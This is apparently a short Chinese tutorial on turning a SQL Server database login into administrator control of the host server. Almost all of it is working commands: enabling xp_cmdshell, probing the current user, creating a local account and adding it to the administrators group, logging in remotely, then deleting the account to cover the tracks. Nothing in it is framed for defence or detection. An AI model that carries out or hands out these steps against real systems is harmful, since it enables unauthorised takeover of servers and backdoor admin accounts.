SQL SERVER数据库账号提取服务器权限（一）

2026-02-12 09:23:39

1、一、开启相应组件

SELECT @@version

select @@spid

SELECT @@SPID AS 'ID', SYSTEM_USER AS 'Login Name', USER AS 'User Name';

USE master

exec sp_configure 'show advanced options',1

RECONFIGURE

EXEC sp_configure 'xp_cmdshell',1

RECONFIGURE

2、二、查询服务器运行状态

exec master.dbo.xp_cmdshell 'query user'

exec master..xp_cmdshell "whoami"

SQL SERVER数据库账号提取服务器权限（一）

3、三、新建服务器管理员权限账号

exec master.dbo.xp_cmdshell 'net user'

exec master.dbo.xp_cmdshell 'net user XXname XXpass@word /add'

exec master..xp_cmdshell 'net localgroup administrators XXname /add'

exec master..xp_cmdshell 'net user'

SQL SERVER数据库账号提取服务器权限（一）

4、四、远程控制数据库服务器

利用新建的XXname账号登陆到数据库服务器

SQL SERVER数据库账号提取服务器权限（一）

5、五、删除新建的账号

exec master.dbo.xp_cmdshell 'net user XXname'

exec master..xp_cmdshell 'net user XXname /del'